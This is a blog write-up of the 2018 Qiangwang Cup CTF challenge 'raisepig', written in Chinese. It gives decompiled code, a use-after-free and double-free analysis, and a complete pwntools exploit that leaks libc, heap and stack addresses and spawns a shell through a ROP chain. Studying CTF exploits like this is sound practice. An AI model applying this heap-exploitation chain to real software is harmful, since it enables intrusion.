强网杯2018_raisepig

qwb_raisepig

0X01 程序分析

首先遇到的问题是反编译伪代码失败, 解决办法参考so

其次看保护情况

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

保护全开

反汇编得到main函数如下:

void __fastcall main(__int64 a1, char **a2, char **a3)
{
  char buf; // [rsp+10h] [rbp-20h]
  unsigned __int64 canary; // [rsp+28h] [rbp-8h]
  __int64 savedregs; // [rsp+30h] [rbp+0h]

  canary = __readfsqword(0x28u);
  sub_1160();
  while ( 1 )
  {
    show_menu();
    read(0, &buf, 8uLL);
    atoi(&buf);
    switch ( (unsigned int)&savedregs )
    {
      case 1u:
        raise_pig();
        break;
      case 2u:
        visit();
        break;
      case 3u:
        eat();
        break;
      case 4u:
        eat_all();
        break;
      case 5u:
        puts("See you next time.");
        exit(0);
        return;
      default:
        puts("Invalid choice");
        break;
    }
  }
}

其中:

raise_pig函数如下:

__int64 raise_pig()
{
  void *v0; // rsi
  size_t name_len; // [rsp+0h] [rbp-20h]
  void *pig_ptr; // [rsp+8h] [rbp-18h]
  void *pig_name_ptr; // [rsp+10h] [rbp-10h]
  unsigned __int64 canary; // [rsp+18h] [rbp-8h]

  canary = __readfsqword(0x28u);
  pig_ptr = 0LL;
  pig_name_ptr = 0LL;
  LODWORD(name_len) = 0;
  if ( (unsigned int)g_count <= 0x63 )
  {
    pig_ptr = malloc(0x28uLL);             //为结构体分配空间
    memset(pig_ptr, 0, 0x28uLL);
    printf("Length of the name :", 0LL);
    if ( (unsigned int)_isoc99_scanf("%u", &name_len) == -1 )
      exit(-1);
    pig_name_ptr = malloc((unsigned int)name_len);  //为猪的名字分配空间
    if ( !pig_name_ptr )
    {
      puts("error !");
      exit(-1);
    }
    printf("The name of pig :", &name_len);
    v0 = pig_name_ptr;
    read(0, pig_name_ptr, (unsigned int)name_len);   //读取猪的名字
    *((_QWORD *)pig_ptr + 1) = pig_name_ptr;         //将指向猪名的指针存到结构体中
    printf("The type of the pig :", v0);
    _isoc99_scanf("%23s", (char *)pig_ptr + 16);     //将猪的类型读到结构体中
    *(_DWORD *)pig_ptr = 1;                          //结构体的前8字节赋值为1
    for ( HIDWORD(name_len) = 0; HIDWORD(name_len) <= 0x63; ++HIDWORD(name_len) )
    {
      if ( !g_array[HIDWORD(name_len)] )
      {
        g_array[HIDWORD(name_len)] = pig_ptr;         //将猪的指针存到全局数组中
        break;
      }
    }
    ++g_count;                                     //记录猪数量的全局变量加一
  }
  return 0LL;
}

pig结构体如下:

struct pig{
    long eat_flag;
    void *name_ptr;
    char[24] type;
}

可以根据代码画出运行raise_pig后内存中的结构图如下:

  g_array
+--------+
| pig_ptr+---+    pig
+--------+   +> +--------+
|        |      |EAT_FLAG|
+--------+      +--------+         name
|        |      |name_ptr+----> +---------+
|        |      +--------+      |         |
|        |      |pig_type|      |         |
|        |      |        |      |         |
+--------+      |        |      |         |
                +--------+      |         |
                                |         |
                                |         |
                                +---------+

visit 函数如下

__int64 visit()
{
  __int64 index; // [rsp+4h] [rbp-Ch]

  HIDWORD(index) = __readfsqword(0x28u);
  if ( g_count )
  {
    LODWORD(index) = 0;
    while ( (unsigned int)index <= 0x63 )
    {
      if ( g_array[(unsigned int)index] && *(_DWORD *)g_array[(unsigned int)index] )
      //可以看到会判断结构体体的eat_flag
      {
        printf("Name[%u] :%s\n", (unsigned int)index, *(_QWORD *)(g_array[(unsigned int)index] + 8LL), index);
        printf("Type[%u] :%s\n", (unsigned int)index, g_array[(unsigned int)index] + 16LL);
      }
      LODWORD(index) = index + 1;
    }
  }
  else
  {
    puts("No pig in the garden !");
  }
  return 0LL;
}

之后可以利用这个函数的输出泄露地址

eat()

__int64 eat()
{
  unsigned int index; // [rsp+4h] [rbp-Ch]
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  if ( g_count )
  {
    printf("Which pig do you want to eat:");
    _isoc99_scanf("%d", &index);
    if ( index > 0x63 || !g_array[index] )
    {
      puts("Invalid choice");
      return 0LL;
    }
    srand(0);
    *(_DWORD *)g_array[index] = 0;     //将结构体的eat_flag置零
    free(*(void **)(g_array[index] + 8LL)); //free(name_ptr)
  }
  else
  {
    puts("No pig");
  }
  return 0LL;
}

这儿free了指向name的指针但是没有将指针清零. 可以doublefree

eat_all()

unsigned __int64 eat_all()
{
  unsigned int i; // [rsp+4h] [rbp-Ch]
  unsigned __int64 canary; // [rsp+8h] [rbp-8h]

  canary = __readfsqword(0x28u);
  for ( i = 0; i <= 0x63; ++i )
  {
    if ( g_array[i] && !*(_DWORD *)g_array[i] )
    //free掉所有eat_flag为0 的结构体
    {
      free((void *)g_array[i]);
      g_array[i] = 0LL;      //将指向结构体的指针置零
      --g_count; 
    }
  }
  puts("Done!");
  return __readfsqword(0x28u) ^ canary;
}

0x02 漏洞分析

就是利用那个没有置零的指针可以进行一系列操作了, 因为我也没做出来. 就参考某不知名大佬的wp分析一遍吧.wp在文章底部给出
做了个ppt, 方便描述. 地址

0x03 总结:

这次又学到了不少骚操作:

  1. free后没有置零可以获得
    1. libc地址
    2. heap地址
  2. 利用 libc中的environ可以泄露stack的地址
  3. 劫持main_arena中top的骚操作: 先劫持个fast bin来得到个有效的size再劫持top到别的地方
  4. 对于计算main_arena在libc中的偏移可以参考大佬的githubrepo

计划把glibc的malloc和free的源码大致看一遍. 基础太重要了

0x04 exp

from pwn import *

context(arch = 'amd64', os = 'linux', endian = 'little')

def Raise(length, name, t):
    p.recvuntil('Your choice : ')
    p.sendline('1')
    p.recvuntil('name :')
    p.sendline(str(length))
    p.recvuntil(' pig :')
    p.send(name)
    p.recvuntil(' pig :')
    p.sendline(t)

def Visit():
    p.recvuntil('Your choice : ')
    p.sendline('2')

def Eat(num):
    p.recvuntil('Your choice : ')
    p.sendline('3')
    p.recvuntil(' eat:')
    p.sendline(str(num))

def EatAll():
    p.recvuntil('Your choice : ')
    p.sendline('4')


debug = 1
if debug == 1:
    p = process('./raisepig')
else:
    p = remote("39.107.32.132", 9999)
 
raw_input()
libc = ELF('./libc-64')
Raise(0x90, 'aa', 'a')
Raise(0x90, 'aa', 'a')
Raise(0x90, 'aa', 'a')
Eat(0)
EatAll()
Raise(0x90, 'a' * 8, 'a')#unsorted bin 指向 main_arena
Visit()
p.recvuntil('a' * 8)
libc.address = u64(p.recvuntil('\n')[ : -1].ljust(8, '\x00')) -0x3c4b78  #why 0x3c4b78
print hex(libc.address)
Eat(0)
Eat(1)
EatAll()
Raise(0x90, 'a' * 8, 'a')
Visit()
p.recvuntil('a' * 8)
heap_addr = u64(p.recvuntil('\n')[0 : -1].ljust(8, '\x00')) #though not used 
print hex(heap_addr)
Eat(0)
Eat(2)
EatAll()
Raise(0x90, '/bin/sh', 'a')
Raise(0x28, 'aa', 'a')
Raise(0x28, 'aa', 'a')
Raise(0x28, 'aa', 'a')
Eat(1)
Eat(2)
Eat(1)#double free
Raise(0x28, 'aa', 'a')
Eat(4)

Raise(0x28, p64(1) + p64(libc.symbols['environ']) + 'aaa', 'a')
Visit()
p.recvuntil('Name[4] :')
stack_addr = u64(p.recvuntil('\n')[ : -1].ljust(8, '\x00'))
print hex(stack_addr)
Raise(0x60, 'aa', 'a')
Raise(0x60, 'aa', 'a')
Raise(0x50, 'aa', 'a')
Raise(0x50, 'aa', 'a')
Raise(0x60, 'aa', 'a')
Eat(6)
Eat(7)
Eat(6)
Eat(8)
Eat(9)
Eat(8)
Raise(0x60, p64(0x60), 'a')
Raise(0x60, 'aa', 'a')
Raise(0x60, 'aa', 'a')

Raise(0x50, p64(libc.address + 0x3c4b48), 'a')#why 0x3c4b48 
Raise(0x50, 'aa', 'a')
Raise(0x50, 'aa', 'a')
Raise(0x50, p64(0) * 4 + p64(stack_addr - 0x140), 'a')
Eat(3)
rop = ROP(libc)
rop.call(libc.symbols['system'], [heap_addr + 0x10])
Raise(0x100, str(rop), 'a')
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,172评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,346评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,788评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,299评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,409评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,467评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,476评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,262评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,699评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,994评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,167评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,827评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,499评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,149评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,387评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,028评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,055评论 2 352

推荐阅读更多精彩内容